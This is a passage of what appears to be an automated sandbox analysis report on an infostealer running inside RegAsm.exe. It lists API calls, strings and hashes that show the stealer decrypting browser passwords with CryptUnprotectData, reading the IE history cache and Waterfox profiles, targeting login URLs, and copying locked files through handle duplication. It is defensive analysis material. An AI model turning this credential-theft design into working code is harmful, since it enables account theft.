                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                            • memset.MSVCRT ref: 00445986
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                            • API String ID: 381723030-3798722523
                            • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                            • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                            Control-flow Graph

                            APIs
                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                            • SetErrorMode.KERNEL32(00008001), ref: 00412799
                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                            • String ID: $/deleteregkey$/savelangfile
                            • API String ID: 1442760552-28296030
                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                            Control-flow Graph

                            APIs
                            • memset.MSVCRT ref: 0040B71C
                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                            • wcsrchr.MSVCRT ref: 0040B738
                            • memset.MSVCRT ref: 0040B756
                            • memset.MSVCRT ref: 0040B7F5
                            • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                            • CloseHandle.KERNEL32(00000000), ref: 0040B838
                            • memset.MSVCRT ref: 0040B851
                            • memset.MSVCRT ref: 0040B8CA
                            • memcmp.MSVCRT ref: 0040B9BF
                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                            • memset.MSVCRT ref: 0040BB53
                            • memcpy.MSVCRT ref: 0040BB66
                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                            • String ID: chp$v10
                            • API String ID: 229402216-2783969131
                            • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                            • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 ??3@YAXPAX@Z 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                            APIs
                              • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                            • memset.MSVCRT ref: 00413D7F
                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                            • memset.MSVCRT ref: 00413E07
                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                            • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                            • CloseHandle.KERNEL32(?), ref: 00413EA8
                            • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                            • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Handle$??3@CloseProcessProcess32memset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                            • API String ID: 3791284831-1740548384
                            • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                            • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                              • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                              • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                            • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                              • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                              • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                            • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                            • CloseHandle.KERNEL32(?), ref: 0040E13E
                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                            • CloseHandle.KERNEL32(?), ref: 0040E148
                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                            • String ID: bhv
                            • API String ID: 4234240956-2689659898
                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                            • __set_app_type.MSVCRT ref: 00446762
                            • __p__fmode.MSVCRT ref: 00446777
                            • __p__commode.MSVCRT ref: 00446785
                            • __setusermatherr.MSVCRT ref: 004467B1
                            • _initterm.MSVCRT ref: 004467C7
                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                            • _initterm.MSVCRT ref: 004467FD
                            • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                            • exit.MSVCRT ref: 00446897
                            • _cexit.MSVCRT ref: 0044689D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                            • String ID:
                            • API String ID: 2791496988-0
                            • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                            • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                            Control-flow Graph

                            APIs
                            • memset.MSVCRT ref: 0040C298
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                            • wcschr.MSVCRT ref: 0040C324
                            • wcschr.MSVCRT ref: 0040C344
                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                            • GetLastError.KERNEL32 ref: 0040C373
                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                            • String ID: visited:
                            • API String ID: 2470578098-1702587658
                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 ??3@YAXPAX@Z 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                            APIs
                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                            • memset.MSVCRT ref: 0040E1BD
                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                            • _snwprintf.MSVCRT ref: 0040E257
                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                            • API String ID: 3883404497-2982631422
                            • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                            • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                              • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                            • memset.MSVCRT ref: 0040BC75
                            • memset.MSVCRT ref: 0040BC8C
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                            • memcmp.MSVCRT ref: 0040BCD6
                            • memcpy.MSVCRT ref: 0040BD2B
                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                            • String ID:
                            • API String ID: 115830560-3916222277
                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                            • String ID: r!A
                            • API String ID: 2791114272-628097481
                            • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                            • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                              • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                            • _wcslwr.MSVCRT ref: 0040C817
                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                            • wcslen.MSVCRT ref: 0040C82C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                            • API String ID: 62308376-4196376884
                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                            • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                            • memcpy.MSVCRT ref: 0040B60D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                            • String ID: BIN
                            • API String ID: 1668488027-1015027815
                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                            Control-flow Graph

                            APIs
                            • memset.MSVCRT ref: 00403CBF
                            • memset.MSVCRT ref: 00403CD4
                            • memset.MSVCRT ref: 00403CE9
                            • memset.MSVCRT ref: 00403CFE
                            • memset.MSVCRT ref: 00403D13
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                            • memset.MSVCRT ref: 00403DDA
                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                            • String ID: Waterfox$Waterfox\Profiles
                            • API String ID: 4039892925-11920434
                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                            Control-flow Graph

                            APIs
                            • memset.MSVCRT ref: 00403E50
                            • memset.MSVCRT ref: 00403E65
                            • memset.MSVCRT ref: 00403E7A
                            • memset.MSVCRT ref: 00403E8F
                            • memset.MSVCRT ref: 00403EA4
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                            • memset.MSVCRT ref: 00403F6B
                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
